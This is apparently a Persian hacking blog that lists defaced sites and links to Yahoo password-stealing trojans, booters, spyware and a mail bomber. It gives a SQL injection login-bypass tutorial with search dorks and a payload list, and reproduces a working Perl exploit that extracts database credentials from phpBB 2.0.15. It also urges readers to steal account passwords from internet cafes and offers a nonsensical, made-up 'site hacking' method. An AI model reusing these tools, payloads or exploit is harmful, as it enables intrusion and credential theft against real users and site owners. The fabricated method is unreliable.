چرت و پرت(خوش اومدین)

http://www.iraqischools.com/news/

این دومیش و سومیش که خودشم نمیدونه باسه ی چی بوده به این میگند کرم یا مرض

http://www.dkoontz.com/sitenews/

http://www.iuslex.it/news/

هک شده توسط حسین Terror Hellish است

یک سری ابزار برای یاهو مسنجر:

برنامه ای برای انجام تغييرات در Status:

Download

برنامه ای برای Crack کردن یاهو که با این کار میتوانید چند یاهو باز کنید

Download

برنامه ای برای ديدن Archive خود و ديگران:

Download

Download crack

برنامه ای برای راحتی کار با متن و شکل های yahoo در چت:

Download

برنامه ای برای فهمیدن بودن یا نبون طرف در چت روشن بودن وب کم طرف و مشخص کردن رومی که فردمورد نظردر آن است

Download

برنامه ای برای ورود به روم های پر:

Download

برنامه ای برای پاک کردن ID خود از ليست دیگران:

Download

برنامه ای که pm مورد نظر ما را هنگامی که بخواهيم به هر کسی که به ما pm دهد می دهد:

Download

برنامه ای برای عکس گرفتن از وبکم افراد:

Download

برنامه ای برای قفل کردن voice ديگران:

Download

برنامه ای برای بيرون انداختن افراد از روم:

Download

برنامه ای برای قفل کردن ID ديگران به طور موقت:

Download

برنامه ای برای تغيير صدا:

Download

برنامه ای برای بمب باران کردن ميل:

Download

ابزارهای مفيد برای ويندوز:

برنامه ای برای فرستادن ايميل های جعلی(قبل از Download اين برنامه به من PM بديد):

Download

برنامه ای برای زيبا کردن text:

Download

برنامه ای برای ديدن username-password-phonenumber در Dialupهای xp:

Download

برنامه ای برای ديدن پسورد های ستاره ای:

Download

برنامه ای برای نشان دادن مدت زمان Download يک فايل:

Download

برنامه های تروجان برای يافتن پسورد ياهو:

++MPS-1.5SE:

Download

Smart-PS v1.3:

Download

Nice:
Download

 joojoo 1.21 tiny:

Download

Snake EditServer:

Download

Toxic-PsV1.0:

Download

Yahoo!Spy:

Download

یک سری برنامه ی بدرد بخور:

IconCollector:

Download

MagicBinder-VB-Lib:

Download

HashEncoder:

Download

برنامه ها ی جاسوسی:

MYSPY:

Download

007spy-trial:

Download

دو بوتر و يک آنتی بوت ساده ولی قوی:

yahoofreezele:

Download

(Yahoo Administrator booter v4.0 (booter:

Download

(Yahoo!Shield (Anti boot:

Download

چند تا بوتر خوب:

Matrix-Meltdown:

Download

LoveToBootV21:

Download

All+American+Booter:

Download

AussieboyzYTunnelDisconnect:

Download

برنامه ای برای پيدا کردن IP:

IP Scanner:

Download

برنامه ای برای پنهان کردن IP:

IP-hider:

Download

برنامه هایی برای Lagger کردن يک روم با افرادش:

Justin__LaGGeR:

Download

Room Lagger:

Download

Shut The Fuck Up 2.0:

Download

Shut The Fuck Up 3.5:

Download

فايلی برای از کار انداختن موس:

Download

اینم یه سری برنامه ی توپ برای شما جیگرا

برنامه ای برای اونایی که میخوان زبان MaiL ِ آی دی شونو عوض کنن. اونم ۳ سوته

 LangChanger

اینم یه سری NeeD FiLe جدید دیگه که میتونین بوتر Login کنید(که در مقاله ی بعدی یه config خوب ژیدا میکنم براتون)

 VBRun60sp5

یه UnLocke واقعاً قوی هست خودمم امتحانش کردم

 Y!-Unbanner

یه برنامه که فقط ویس ON میکنه و فقط ویس داری تو روم بکس بوت هم نمیشه 

  X-Vox 

یه برنامه برای Lock (قفل) کردن آی دی 

 DeViL LocK 

یه برنامه برای پیدا کردن Ip شخص یا سایت مورد نظر که بدونه برنامشم قبلا توضیح دادم

 IpTheif 

یه برنامه برای پیدا کردن Ip شخص یا سایت مورد نظر(به دردتون میخوره)

ipsnifferpro

يه بوتر واقعاً قوی و توپُخوراک اونایی که عشق بوت دارند

AcidTabVer6

برنامه ای برای ديدن پسورد های ويندوز

Behzad-Pass

یه آنتی بوتر نسبتا خوب

 Yahoo-Guard

به زور چپیدن تو روم بد نیست بگیر بدردت میخوره

 RooM Full

برنامه ای برای ريختن ID توی روم و گرفتن Talk به طور فضايی

 MTB

Online یا Offline بودن فرد مورد نظر رو نشون میده

On Line Checker

یه بوتر توپ

YaErrorGoldEdition

اينم برای Voice کشی توی چت روم های ياهو خوراکه اونایی هست که میخواند تو روم کسی رو خفه کنند

STB!9.46

برای ساختن ID با دات. مثال DeViL.HeRoGaMe يا Enet. يا MY256. يا Sogua. برو حال کن

ID MaKeR  

برنامه ای برای بستن و لاک کردن روم فکر کنم همتون خوشتون بیاد

RooM LaGGeR

بچه ها گفتم شاید لینک بالا کار نکنه این همون برنامست که هر چند تا که بخوای یاهو باز میکنی

 Magic - Login - Full

 برنامه ای برای در آوردن پسورد افراد در ياهو مسنجر همراه با دکودر باحال

Magic - Ps 1.5 Full 

برنامه ای برای Search کردن Ip Proxy سبز برو حال کن

Proxy Retriever 3

برنامه ای برای Login کردن چند آی دی بطور همزمان (برای ياهوی جديد)حال کنید!!!!

PaTchYM6full1710

برنامه ای برای Save کردن Flash های موجود در سايت

 Save Flash 

 اينم سريالش  Serial

اين برنامه خوراک اونايی هست که می خوان از کافی نت يوزر + پسورد اکانت بدزدن مخصوصا بروبچ فلکه اول

تو پاساژ سپید راحت از کافی نت هاش بدزدید

 Dial--Pass

برنامه ای برای قفل کردن Talk در چت رومهای ياهو

YaHeeK

اينم آنتی بوتر قوی برای جیگرای بازدیدکننده

Y!Tunnle 350

اينم سريالش Serial

اينم يه برنامه برای قفل (Lock) کردن ID در ياهو مسنجر

ID LockeR

اينم يه برنامه برای اينکه ID قفل (Lock) شده در ياهو مسنجر را باز ( UnLock ) کنيد

Un LockeR

اينم يه برنامه برای اونايی که می خوان با ويندوز XP سرويس پک ۱ بوتر Login کنن که یه Need File بالا هم گزاشتم

NeeD FiLe

برای امرز دیگه بسته هم تو زیادیت میشه هم من خسته شدم بای جیگرا بازم اینجا بیاید

در اين روش شما نيازی به نصب هيچ برنامه ای نداريد و تنها با تنظيم  اينترنت اكسپلورر خود و وارد كردن چند عدد در آن می توانيد از سد فيلترهای اينترنتی مخابرات عبور كنيد و با خيال راحت در در در دنيای اينترنت گردش كنيد -  روش كار به اين صورت است

به قسمت Internet Option  در Control Panel  برويد و بر روی Connections  رفته و بر روی سرويس اينترنتی كه از آن استفاده می كنيد و با آن را انتخاب نموده و بر روی Settings  كليك كنيد - حال Use Proxy  را تيك بزنيد و در قسمت آدرس يكی از شماره های IP  را در جدول زير وارد كنيد و در مقابل آن و در قسمت Port  - شماره پورت را وارد كنيد و كليك كنيد. اگر يكی از شماره ها جواب نداد و كار نكرد - يكی ديگر را امتحان كنيد .

تذكر : برای ورود به بعضی از سايتها ( مثلاً ايميل ياهو ) بايد تيك استفاده از پروكسی را موقتاً برداريد .

ميتوانيد از آدرس آی پی و  پورتهای زير استفاده كنيد
IP Address Port 

195.175.37.6-۸۰۸۰
217.110.71.114- 8080 
195.175.37.23 -8080 
210.187.110.230- 8080 
61.107.109.130- 8080 
62.231.38.245- 8080 
211.126.196.172 -8080 
62.190.148.33 -8080 
202.134.0.136 -8080 
203.197.203.35 -8080 
200.69.129.242- 81

ليست پروکسي آزاد

نحوه ساختن ویروس بلستر

این ویروس کارش خاموش کردن کامپیوتر ظرف ۳۰ ثانیه است . بدین ترتیب که وقتی اجرا میشه پیغامی تحت عنوان اینکه کامپیوتر شما ظرف مدت ۳۰ خاموش می شود می دهد .اول آنتی ویروس یاد میدم بدنم خوده ویروس . اول روی دسکتاپ راست کلیک کرده و گزینه New shortcut را انتخاب کرده و تایپ کنید shutdown -a و Next را زده نامی براش انتخاب کرده و Finish را بزنید .الان آنتی ویروس شما آماده است میتونید روش راست کلیک کرده گزینه Properties را انتخاب کرده و change Icon را زده و آیکون آنرا عوض کنید . حالا نحوه ساختن ویروس باز روی دسکتاپ راست کلیک کرده و گزینه New shortcut را انتخاب کرده و تایپ کنید shutdown -r و Next را زده نامی براش انتخاب کرده و Finish را بزنید . الان ویروس شما آماده است باز می توانید شکل آیکون آنرا عوض کنید . نحوه استفاده از آن هم به عهده خودتون است .

نحوه پیدا کردن IP

برای پیدا کردن IP یه شخص تو چت یا IP یه سایت کافیه برید تو start در قسمت Run تایپ کنید cmdبعد ok را کلیک کنید . یه صفحه سیاه باز میشه اونجا تایپ کنید netstat -r یا netstat -n و Enter را فشار دهید .

یه راه برای اینکه هک نشوید

بعضی از هکرا یه صفحه می سازند شبیه صفحه sing up یاهو وقتی یوزر و پسورد می نویسید میره به ادرس ایمل طر ف و شما هک میشید . پس مواظب باشید یوزر و پسورد خودتونو هرجایی ننویسید .

اگه هک شدید چکار کنید

وقتی دارید آیدی می سازید یا آدرس ایمیل تو فرمی که پر می کنید از شما تاریخ تولد می پرسه . اون تاریخ هیشه یادتون باشه . چون وقتی آیدی شما هک شد باید برید تو یاهو تو پنجره sing in یه جایی هست که نوشته Forget your ID or password کلیک کنید و بعد تاریخ تولد خودتونو و آیدیتونو نوشته و روی get new password کلیک کنید . به همین سادگی می تونید آیدی خودتونو پس بگیرید .

هک کردن سایتها با پی اچ پی نوک

 خوب از php که بگذريم ميرسيم به پورتالهاي قويتر و بهتر به نام asp که گفتم که asp هم يک زبان برنامه نويسي تحت وب هستش که تنها مشکلي هم که داره تو قسمت ورود به کنترل پنلش هستش که با يک پسوورد ميشه وارد اون شد که اين اشکال به اين دليل که کسي که سايت رو طراحي کرده اين اشکالات : ( ) , ( , = . " . ' ‌) رو فيلتر نکرده و شما ميتونيد با يک پسوورد که اين علامات در اون به کار رفته سايت رو اينجکت کنيد که injection در زبان انگليسي به معني تزريق کردن ميباشد خوب حالا من طرض استفاده اين کار رو بهتون ميگم ابتدا تو گوگل يا ... سرچ کنيد :

inurl:login.asp

inurl:admin.asp

خوب ميتونيد يک کلمه فارسي يا عربي مثل في يا فارسي يا ... جلوي اينها بنويسيد خوب بالاخره تو کار هک بايد از خودتون هم يخورده ابتکار عمل نشون بديد خوب حالا اون پسووردها هم اينها هستند :

 ' or ''='

admin" or "a"="a

admin" or 1=1 --

admin' or 1=1 --

admin' or 'a'='a

admin') or ('a'='a

admin") or ("a"="a

a=1)--

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a </BODY< SPAN>>

</< SPAN>html>

phpbb2.0.15 آموزش هک

شما توسط این اموزش میتونید به راحتی یه فروم رو هک کنید تنها کاری که لازمه اینکه در اون سایت عضو شید که خودبه خود سایت به شما یه کوکی میده وبااستفاده از همین کوکی سایت رو هک کنید

برای این کار ابتدا ببینید کوکی شما در کجا ذخیره میشه که عموما در

C:\Documents and Settings\name of your pc\Cookies

شما داره حالا میرید نو  و کوکی اون فروم وهرچی نوشته به غیر از ستاره اخرسش رو pcذخیره میشه که بسته به اسم      

copy

میکنید تابه شما کلیه اطلاعات لازم واسه هک روبده  past exploitمیکنیدحالا این کدرودر این

exploit:اینم

#!/usr/bin/perl

# *******************************

#*

#* phpBB 2.0.15 Viewtopic.PHP Remote Code Execution Vulnerability

#* This exploit gives the user all the details about the database

#* connection such as database host, username, password and

#* database name.

#*

#* Written by SecureD, gvr.securedgmailcom,2005

#*

#* Greetings to GvR, Jumento, PP, CKrew & friends

#*

# *******************************

use IO::Socket;

print "+-----------------------------------------------------------------------+\r\n";

print "| PhpBB 2.0.15 Database Authentication Details Exploit |\r\n";

print "| By SecureD gvr.securedgmailcom |\r\n";

print "+-----------------------------------------------------------------------+\r\n";

if (@ARGV < 3)

{

print "Usage:\r\n";

print "phpbbSecureD.pl SERVER DIR THREADID COOKIESTRING\r\n\r\n";

print "SERVER - Server where PhpBB is installed.\r\n";

print "DIR - PHPBB directory or / for no directory.\r\n";

print "THREADID - Id of an existing thread.\r\n";

print "COOKIESTRING - Optional, cookie string of the http request.\r\n";

print " Use this when a thread needs authentication for viewing\r\n";

print " You can use Firefox in combination with \"Live HTTP\r\n";

print " Headers\" to get this cookiestring.\r\n\r\n";

print "Example 1 (with cookiestring):\r\n";

print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 8 \"

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22

autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22

userid%22%3Bs%3A1%3A%222%22%3B%7D;

phpbb2mysql_sid=10dae92b780914332896df43808c4e09\" \r\n\r\n";

print "Example 2 (without cookiestring):\r\n";

print "phpbbSecured.pl 192.168.168.123 /PHPBB/ 20 \r\n";

exit();

}

$serv = $ARGV[0];

$dir = $ARGV[1];

$threadid = $ARGV[2];

$cookie = $ARGV[3];

$serv =~ s/http:\/\///ge;

$delimit = "GvRSecureD";

$sploit = $dir . "viewtopic.php?t=";

$sploit .= $threadid;

$sploit .= "&highlight='.printf($delimit.";

$sploit .= "\$dbhost.";

$sploit .= "$delimit.";

$sploit .= "\$dbname.";

$sploit .= "$delimit.";

$sploit .= "\$dbuser.";

$sploit .= "$delimit.";

$sploit .= "\$dbpasswd.";

$sploit .= "$delimit).'";

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80")

or die "[+] Connecting ... Could not connect to host.\n\n";

print "[+] Connecting OK\n";

sleep(1);

print "[+] Sending exploit ";

print $sock "GET $sploit HTTP/1.1\r\n";

print $sock "Host: $serv\r\n";

if ( defined $cookie) {

print $sock "Cookie: $cookie \r\n";

}

print $sock "Connection: close\r\n\r\n";

$succes = 0;

while ($answer = <$sock>) {

$delimitIndex = index $answer, $delimit;

if ($delimitIndex >= 0) {

$succes = 1;

$urlIndex = index $answer, "href";

if ($urlIndex < 0){

$answer = substr($answer, length($delimit));

$length = 0;

while (length($answer) > 0) {

$nex = index($answer, $delimit);

if ($nex > 0) {

push(@array, substr($answer, 0, $nex));

$answer = substr($answer, $nex + length($delimit), length($answer));

} else {

$answer= "";

}

}

}

}

}

close($sock);

if ($succes == 1) {

print "OK\n";

sleep(1);

print "[+] Database Host: " . $array[0] . "\n";

sleep(1);

print "[+] Database Name: " . $array[1] . "\n";

sleep(1);

print "[+] Username: " . $array[2] . "\n";

sleep(1);

print "[+] Password: " . $array[3] . "\n";

sleep(1);

} else {

print "FAILED\n";

}

آموزش کلی مبارزه با ویرووس ها و آشنایی با آنها

آموزش مبارزه با ویرووسها  =>

شما اولین کاری که برای مبارزه با اونا میکنین اینه که دستگاهتونو به یه آنتی ویرووس مجهز کنین که بهترینشون Norton.symantec.mcAfee.panda &avg هستش اما اینم بگم که آنتی ویرووسهای Norton روی بعضی از ویندوز های Xpجواب نمیده و باعث هنگ کردن سیستم میشه .

اگه شما آنتی ویرووس نداشتین و به ویرووس آلوده شدین اولین کار اینه که سیستم خودتون رو Restor کنین تا ویرووس به همه جا انتقال پیدا نکنه که برای Restor کردن مراحل زیر رو انجام بدین : =>

1- روی My computer راست کلیک کرده و Propertiseرو انتخاب کنین

2- از صفحه باز شده اون بالا لبه ی System Restore  رو انتخاب کنین

3- گزینه Turn off System restore رو تیک بزنین و در آخر Apply  ... OK

با این کار از ویرووسی شدن تمام سیستم جلوگیری میکنین .

قدم دوم شناسایی ویرووس هست که بازم با آنتی ویرووس های میشه پیدا کرد ( بهتره یه شناختی از ویرووس ها بهتون بدم )

آشنایی کلی با ویرووس های کامپیوتری

1- ویرووس ها در کل به سه گروه طبقه بندی میشن 1- اسب تروا (Troijan-hourse ) . کرم ها ( Worms ) . بمب های منطقی (Logical bomb )

اهداف ویرووس ها :

ویرووس ها جایی انتشار پیدا می کنن که دارای تغییر پذیری باشه مثل ( جداول - رکورد بوت - پرونده ها و ....... ) پرونده هایی که دارای پسوند های sys.bat.com & exe هستن هدفهای اونا هستن .

چگونگی انتشار ویرووس :

ویرووس ها بیشتر خودشون رو به اسناد و فولدر ها میچسبونن و از طریق اونا وارد میشن . اگه ما 2 تا فولدر داشته باشیم که دارای اسم های یکی باشن ولی پسوند هاشون فرق کنه کامپیوتر اول اون برنامرو اجرا میکنه که پسوند .com  رو داشته باشه به همین علت ویرووسها خودشون رو با همون اسم فایل ها تکثیر می کنن اما با پسوند .com که کامپیوتر اونارو اجرا کنه .

ساختار ویرووس ها :

ویرووس ها از دو بخش تکثیر و تخریب تشکیل شده اند . بعضی از ویرووس ها فقط برنامرو آلوده می کنن. در برنامه های آلوده یک علامت می نویسن که به آنها امضای ویرووس میگن و وقتی ویرووس بخواد برنامرو آلوده کنه اول به دنبال امضاء میگرده اگه وجود نداشت اونو آلوده میکنه و الگه وجود داشت که میدونه برنامه آلوده هست

آنتی ویرووس ها :

آنتی ها دارای 2 گونه میباشن یکی مقیم و اون یکی غیر مقیم  که فرق اونا اینه که آنتی مقیم به محض شروع فعالیت ویرووس اونو شناسایی و از بین میبره .  اما آنتی غیر مقیم به این شکل نیست .

آنتی ویرووس ها یه دروازه هستن که همیشه وقتی برنامه بخواد اجرا بشه باید اول از آنتی بگذره و بعد به سیستم عامل بره . اما اگه آنتی وجود نداشته باشه برنامه یه راست میره به سیستم عامل .

معرفی چند ویرووس :

1-Disk killer  اگر کامپیوتر بیشتر از 24 ساعت روشن باشه Hard disk رو خراب میکنه

2- lazy  باعث کم شدن حافظه و سرعت سیستم میشه

3- Mistake  تمام حروف را بر روی پرینتر عوض میکنه مثلا حرف c را k و k رو c چاپ میکنه

4- Pc-Flu  باعث مختل شدن کار های آنتی ویرووس ها میشه

5- Blaster    باعث ریست شدن کامپیوتر و تکثیر در آن میشود

6-Albania  باعث تکثیر فراوان در کمتر از 3 ساعت است

7- Nimda باعث تکثیر فراوان شده و آیکون های اون شبیه به پاکت نامه است

هک کردن سایت بدون هیچ برنامه ای

۱: در مرحله اول باید از طریق کاممند پرت آی پی سایت رو بدست بیاوریم.

۲:در مرحله دوم شما می بایست و ارد آدرس c:\windows\web شوید.

۳:در مرحله سوم باید شما باید با ایجاد کردن فولدر هایی که در آن ها نا هماهنگی هایی وجود دارد

در سرور آن سایت اختلال ایجاد کنید.و به راحتی در ۳ مرحله آن سایت رو هک کنید.

--------------------------------------------------------------------------------

ما یاد داده بودیم که آیپی سایت رو میتونیم به سادگی به دست آوریم.

بعد از این که آی پی سایت رو به دست آوردیم. وارد پوشه c:\windows\web شده و مراحل زیر رو به

ترتیب انجام دهید. در واقع در این روش ما با ایجاد  زبان های هک برنامه نویسی جاوا سرور آن سایت

رو هک میکنیم.پس مراحل زیر رو دنبال کنید.

--------------------------------------------------------------------------------

۱:وارد پوشه وب در ویندوز شده  فایل ها رو خوب مشاهده کنید.حالا وارد پوشه

c:\windows\java شده.خب پس از وارد فولدر classes شده و در آن یک نوتپد باز کنید.

نام نوتپد مهم نیست. (**هکره لیزری**). حالا وارد آن شده و این نوشته ها رو تایپ کنید.

--------------------------------------------------------------------------------

                     lan\:Q:\victumip\server\567\jav57\source\view

فقط باید به جای victumip آی پی  سایت رو قرار بدید.حالا وارد پوشه وب که قبلا رفته بودید شوید.

و  یک فولدر به نام c:\windows\classes بسازید.توجه داشته باشید که حتما باید آدرس دقیق پوشه

کلاسس رو بهش بدید.خب حالا ۹۹ درصد کار تموم شده است.وارد سایتی که برای کنترل سایت

هست شوید مانند بلاگفا که برای مدیریت وبلاگ هستش.حالا در قسمت username آدرس  سایت رو

بنویسید و ورود یا signin رو بزنید حالا باید وارد بخش مدیریت شوید اگر نشد به جای یوزر نیم سایت

آی پی سایت رو وارد کنید و مطمئن باشید که این دفعه میره.البته این هک کردن با پرت ۵۶۷ هستش

و این قوی ترین پرتیه که من برای هک کردن سایت میشناسم هستش.

PC Security Test 2005امنیت!!!!!

به کمک این برنامه می تونید از امنیت کامپیوتر در مقابل ویروس ها و هکرها اطمینان حاصل کنید.

اینم لینک دانلود برنامه : http://www.pc-st.com/us/pcsecuritytest.zip

 دیگه برای این دفعه بسته خسته شدم فعلا بای.

http://www.proxyspot.com

كاهش ظرفيت فايل ها و آدرس های اينترنتی كه در كامپيوتر ذخيره می شوند.

پاك كردن هر روز فايل های موقت و آدرس های اينترنتی ، واقعاً اعصاب را خسته می كند. شما می توانيد Cashe خود را طوری تنظيم كنيد كه فقط اطلاعات كمی را بتوانيد ذخيره كنيد.
برای اين كار در Browser، Tools و سپس Internet Option را انتخاب كنيد. در پنجره باز شده بر روی قسمت Settings كليك كنيد. در آنجا قسمت Amount of disk space to use را برابر مقدار 1MB تنظيم كنيد.
 

استارت سريع!

اگر عمل Shutdown در كامپيوتر درست انجام نشود، كامپيوتر در استارت بعدی، برای اينكه هارد را از لحاظ داشتن خطا يا اشتباه چك كند، با برنامه Scandisk استارت می شود كه مستلزم صرف زمانی طولانی است. برای اينكه از اجرا شدن Scandisk جلوگيری كنيد، به ترتيب زير عمل كنيد:
از منوی استارت بر روی Run كليك كرده و بعد دستور msconfig را اجرا كنيد. سپس قسمت system configuration programs را باز كنيد و در قسمت Register، general كليك كنيد و سپس فرمان “ Scandisk after error by shutdown disabled “ را فعال كنيد. در آخر، همه پنچره ها را با دستور ok ببنديد و ويندوز را دوباره استارت كنيد  

کلیک کن روی عکس وپر تو !!!

بچه ها بگیرید

                   
FREE
internet account 


براي اينترنت رايگان
اينجا را کليک کنيد !ه   

                   

اثرات W32.Blaster.Worm
این کرم بسیار پیشرفته باعث می شود تا سیستم شما تنها پس از گذشت 60 ثانیه از اتصال به اینترنت ، خاموش شود .

برای پاک سازی دستگاه خود مراحل زیر را بترتیب اجرا نمایید :

1. فایل اصلاحیه MS03-026 Patch را از سایت مایکروسافت دریافت نمایید (لينک در يافت اين فايل در زير قرار دارد)
2. پس از نصب این اصلاحیه ، سیستم خود را ریست کنید .
3. بعد از بالا آمدن سيستم فایل FIXBLAST.exe را دریافت و اجرا کرده ، این فایل فعالیت کرم (MSBLAST.exe) را متوقف نموده و باعث می شود کدهای ریجستری که توسط آن در ویندوز وارد شده اند حذف گردند .
4. مجدداً و برای آخرین بار سیستم خود را ریست نمایید .
5. به سایت WindowsUpdate.com مراجعه کنيد تا در صورت لزوم آخرین به روز رسانی ها برای حذف این کرم بصورت خودکار برای شما صورت گیرد .

توجه :
اگر شرایط به گونه ای باشد که سیستم شما قبل از دریافت این فایلها خاموش شود ، دکمه start و سپس run را کلیک نموده و در کادر مربوط عبارت shutdown -a را تایپ نمایید . این روش باعث می شود فرایند خاموش شدن دستگاه شما متوقف شود .

 دريافت: Windows XP Patch | Windows 2000 Patch
 دريافت: FixBlast - W32.Blaster.Worm Removal Tool

**************************************************

خوب اينها فقط يه سری چرتو پرت بود ولی اصل مطلب اينجاست:
اين کرم با دستکاری رجيستری ويندوز با هر بار اجرای ويندوز بار گذاری ميشه و منتظر ميمونه تا کامپيوتر طرف کانکت بشه بعد هم حتما مثل بقيه ويروسها يه جستجويی در فايل های WAP يا ليست ايميل های Outlook می کنه و خودشو برای آدرس ايميل هايی که بدست آورده پست می کنه (اينجاشو شک دارم شايد اصلا خودشو نفرسته. الله اعلم) بعد هم يه پيام که اصلا يکی از پنجره های ويندوز ۲۰۰۰ و اکس پی هست رو نمايش می ده که از ۶۰ تا ۰ شمارش معکوس می کنه و بعد هم restart يا shut down . برای همين فکر می کنم اگر ويندوز غير از xp يا ۲۰۰۰ باشه اين کرم پيام گفته شده رو نمايش نده!

اين ويروس خودش رو در شاخه system يا system32 با نام msblas*.exe کپی می کنه و يه مقدار جديد در HKLM\Software\Microsoft\Windows\CurrentVersian\Run در رجيستری ويندوز بوجود مياره که باعش اجراش در هر بار راه اندازی ويندوز می شه. اين مقدار در کامپيوتر من "windows auto update" هست اما مطمئنا اين کرم باهوش تر از اينکه فقط از يه مقدار استفاده کنه!

خوب اينهمه اطلاعات برای چش بود؟ برای شما برنامه نويسا بود ديگه. برای تمرين هم که شده يه ويروس ياب بساز که اين کرم رو شناسايی و در صورت وجود پاک کنه (فقط هم همين کرم يه ويروس ياب کلفت نخاستيم!). برام بفرست تا کار هرکسی رو در هر زبون برنامه نويسی همين جا به نمايش بذاريم. من خودم هم اين کار رو می کنم. منتظر نظرات شما هستم.

نکته ی مهم:بعضی ها رو جو نگیره بگند این چه راهیه راه های راحت تری هم هست ولی نه اشتباه نکن این بهترین راهه چون به کل پاک میشوند

Vulnerability Scanner ابزاري است که به کمک اون ميشه کامپيوترهاي شبکه رو از نظر وجود سوراخ‌هاي امنيتي تست کرد. vul scanner ها اين کار را به صورت اتوماتيک يا نيمه‌اتوماتيک انجام مي‌ده.

نكاتى در مورد Backorifice

Backorifice يك برنامه كاربردى سرويس‏دهنده / سرويس‏گيرنده است كه به نرم‏افزار سرويس‏گيرنده اجازه نظارت، مديريت و اجراى ديگر اعمال چندرسانه‏ايى و شبكه را بر روى ماشينى كه در حال اجراى سرويس‏دهنده است، مى‏دهد. براى ارتباط برقراركردن با سرويس‏دهنده، متن و يا سرويس‏گيرنده gui مى‏توانند بر روى هر ماشين ويندوز مايكروسافت به اجرا دربيايند. سرويس‏دهنده بطور متداول فقط در ويندوز 98/95 اجرا مى‏شود.

 
حملات تزريق دو مرحله اي ، جديد و خطرناك - بخش آخر

طبیعت تزریق کدهای معمولي به گونه ای است که خیلی راحت قابل کشف هستند. با فرستادن یک URL تركيب شده براي حمله (بطور مثال وجود عبارتی شبیه به ) و دیدن پاسخ سرور ، پروسه کشف آسیب پذیری به صورت مکانیزه در می آید.

 
حملات تزريق دو مرحله اي ، جديد و خطرناك

آموزش مبارزه با ویرووسها  =>

شما اولین کاری که برای مبارزه با اونا میکنین اینه که دستگاهتونو به یه آنتی ویرووس مجهز کنین که بهترینشون Norton.symantec.mcAfee.panda &avg هستش اما اینم بگم که آنتی ویرووسهای Norton روی بعضی از ویندوز های Xpجواب نمیده و باعث هنگ کردن سیستم میشه .

اگه شما آنتی ویرووس نداشتین و به ویرووس آلوده شدین اولین کار اینه که سیستم خودتون رو Restor کنین تا ویرووس به همه جا انتقال پیدا نکنه که برای Restor کردن مراحل زیر رو انجام بدین : =>

1- روی My computer راست کلیک کرده و Propertiseرو انتخاب کنین

2- از صفحه باز شده اون بالا لبه ی System Restore  رو انتخاب کنین

3- گزینه Turn off System restore رو تیک بزنین و در آخر Apply  ... OK

با این کار از ویرووسی شدن تمام سیستم جلوگیری میکنین .

قدم دوم شناسایی ویرووس هست که بازم با آنتی ویرووس های میشه پیدا کرد ( بهتره یه شناختی از ویرووس ها بهتون بدم )

آشنایی کلی با ویرووس های کامپیوتری

1- ویرووس ها در کل به سه گروه طبقه بندی میشن 1- اسب تروا (Troijan-hourse ) . کرم ها ( Worms ) . بمب های منطقی (Logical bomb )

اهداف ویرووس ها :

ویرووس ها جایی انتشار پیدا می کنن که دارای تغییر پذیری باشه مثل ( جداول - رکورد بوت - پرونده ها و ....... ) پرونده هایی که دارای پسوند های sys.bat.com & exe هستن هدفهای اونا هستن . 

چگونگی انتشار ویرووس :

ویرووس ها بیشتر خودشون رو به اسناد و فولدر ها میچسبونن و از طریق اونا وارد میشن . اگه ما 2 تا فولدر داشته باشیم که دارای اسم های یکی باشن ولی پسوند هاشون فرق کنه کامپیوتر اول اون برنامرو اجرا میکنه که پسوند .com  رو داشته باشه به همین علت ویرووسها خودشون رو با همون اسم فایل ها تکثیر می کنن اما با پسوند .com که کامپیوتر اونارو اجرا کنه .

ساختار ویرووس ها :

ویرووس ها از دو بخش تکثیر و تخریب تشکیل شده اند . بعضی از ویرووس ها فقط برنامرو آلوده می کنن. در برنامه های آلوده یک علامت می نویسن که به آنها امضای ویرووس میگن و وقتی ویرووس بخواد برنامرو آلوده کنه اول به دنبال امضاء میگرده اگه وجود نداشت اونو آلوده میکنه و الگه وجود داشت که میدونه برنامه آلوده هست

آنتی ویرووس ها :

آنتی ها دارای 2 گونه میباشن یکی مقیم و اون یکی غیر مقیم  که فرق اونا اینه که آنتی مقیم به محض شروع فعالیت ویرووس اونو شناسایی و از بین میبره .  اما آنتی غیر مقیم به این شکل نیست .

آنتی ویرووس ها یه دروازه هستن که همیشه وقتی برنامه بخواد اجرا بشه باید اول از آنتی بگذره و بعد به سیستم عامل بره . اما اگه آنتی وجود نداشته باشه برنامه یه راست میره به سیستم عامل .

معرفی چند ویرووس :

1-Disk killer  اگر کامپیوتر بیشتر از 24 ساعت روشن باشه Hard disk رو خراب میکنه

2- lazy  باعث کم شدن حافظه و سرعت سیستم میشه 

3- Mistake  تمام حروف را بر روی پرینتر عوض میکنه مثلا حرف c را k و k رو c چاپ میکنه 

4- Pc-Flu  باعث مختل شدن کار های آنتی ویرووس ها میشه

5- Blaster    باعث ریست شدن کامپیوتر و تکثیر در آن میشود

6-Albania  باعث تکثیر فراوان در کمتر از 3 ساعت است

7- Nimda باعث تکثیر فراوان شده و آیکون های اون شبیه به پاکت نامه است

 (آقا یه وقت به کسی بر نخوره اینو یکی خواسته بود منم گفتم)

ميتوان رجيستري را قلب ويندوز ناميد. با تغيير برخي از كدهاي رجيستري ميتوانيد برخي از خصوصيات ويندوز را كه خوشتان نمي آيد حذف ياتغيير دهيد.

 تذكر مهم:

بايد دقيقا مثل همين كليدها را در رجيستري وارد كنيد.كوچكترين تغييري ممكن است منجر به دوباره اينستال كردن ويندوز شود.

 براي شروع كار ابتدا در قسمت Run اين دستور را وارد كنيد و كليد OK را كليك كنيد:

Regedit

 پس از تغيير دستور مورد نظر فقط پنجره Registry Editor را ببنديد و كامپيوتر را Restart كنيد تا تغييرات اعمال شوند.

 حالا هر كدام از دستورات زير را كه دوست داريد ميتوانيد تغيير دهيد.

 بدون Favorites :

اگر از  در منوي  خوشتان نمي آيد ميتوانيد آن را حذف كنيد.براي اين كار به زير كليد:

 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

رفته و يك مقدار  به نام NoFavoritesMenu بسازيد و به آن مقدار 1 دهيد.

